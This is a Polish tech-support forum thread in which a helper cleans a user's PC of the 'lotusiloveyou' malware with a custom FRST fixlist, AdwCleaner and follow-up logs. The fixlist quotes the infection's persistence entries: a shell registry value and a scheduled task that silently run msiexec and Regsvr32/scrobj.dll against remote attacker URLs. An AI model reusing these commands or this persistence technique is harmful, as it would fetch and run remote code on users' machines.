Skocz do zawartości

Jak usunąć URL:Mal "lotusiloveyou"


Rekomendowane odpowiedzi

Witam,
To mój pierwszy post na tym forum. Od kilku dni mam problem - avast ciągle wyświetla monity o malware "llotusiloveyou". Z monitu wynika, że jest on związany z procesem Regserv32. Skanowanie nic nie daje, nie usuwa niczego. Zgodnie z informacją na forum przeskanowałem komputer za pomocą FRST i GMER-a, jednak w przypadku tego drugiego nie mogłem zaznaczyć wszystkich elementów do skanowania (jedynie usługi, rejestr i pliki). Na forum avasta znalazłem taką informację z fixlistą dla FRST (https://goo.gl/swsNgs), niestety z tego co widzę każda fixlista musi być dopasowana indywidualnie. W załączniku dodaję raporty ze skanów. Z góry dziękuję za pomoc.

Addition.txt

FRST.txt

GMER.txt

Shortcut.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

Z monitu wynika, że jest on związany z procesem Regserv32.

To sprawka wpisu w Harmonogramie Zadań. 

 

Na forum avasta znalazłem taką informację z fixlistą dla FRST (https://goo.gl/swsNgs), niestety z tego co widzę każda fixlista musi być dopasowana indywidualnie.

 

Tak i zastosowanie Fix'a na innym systemie niż, dla którego został napisany grozi jego uszkodzeniem. 

 


 

W systemie jest wstawiony klucz na powłoce Shell oraz w Harmonogramie Zadań, który uruchamia tą stronę. Oprócz tego kasuję resztki po programach, sprzątam w systemie. 

Są to wpisy infekcyjne.  

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj88NkZWNkY3FjH5MdzLMkVYFjY8MdU5OWlYRYZQNYRLMq== /q
HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
Toolbar: HKU\S-1-5-21-1673507172-2206377428-1642603207-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} -  No File
S3 dbx; system32\DRIVERS\dbx.sys [X]
Task: {671CE90D-BF79-4C3E-A1DE-A8F5F0ABC436} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj88NkZWNkY3FjH5MdzLMkVYFjY8MdU5OWlYRYZQNYRLMq== scrobj.dll
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OSGeo4W\OSGeo4W Shell.lnk
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Zresetuj synchronizację w przeglądarce Mozilla FireFoxKLIK (nie wiem czy te wpisy, niczego tam nie wstawiły - jak jest to dla Ciebie kolizyjne resetować synchronizację to możesz pominąć).

 

3. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 

 

4. Zrób nowy log FRST z opcji Skanuj (Scan) (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Dziękuję za szybką odpowiedź.
Zrobiłem wszystko według listy - stworzyłem fixa i uruchomiłem FRST, wyłączyłem synchronizację w Firefoksie, przeskanowałem i oczyściłem AdwCleanerem, na koniec jeszcze raz przeskanowałem FRST. W załączniku wrzucam logi z każdego programu. Ponieważ ten monit wyświetlał się co jakiś czas (1 - 2 h) to dam znać po dłuższej chwili czy te działania pomogły. Jedno mnie zastanawia -  AdwCleaner usunął mi Wise Registry Cleaner. To kwestia możliwej infekcji czy faktu, że WRC modyfikuje rejestr i przez to jest potencjalnie niebezpieczny?

AdwCleanerC0.txt

Fixlog.txt

FRST.txt

Odnośnik do komentarza

Przepraszam, nie zwróciłem uwagi na instalację Wise Registry Cleaner. Gdyby zwrócił prosiłbym tylko o skan bym mógł zweryfikować wyniki. 

W panelu sterowania w sekcji Programy spróbuj wybrać opcję naprawczą po zaznaczeniu tego programu, gdyby to jednak było niemożliwe to zainstalujesz program od nowa ze strony producenta

 

Jeśli zaś chodzi o resztę to wszystko pomyślnie wykonana, - system uprzątnięty, infekcja usunięta. Komunikat nie ma prawa już wystąpić. 

Czekam na odzew dot. stanu problemu na wszelki wypadek, a potem przechodzę do finalizacji tematu. 

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...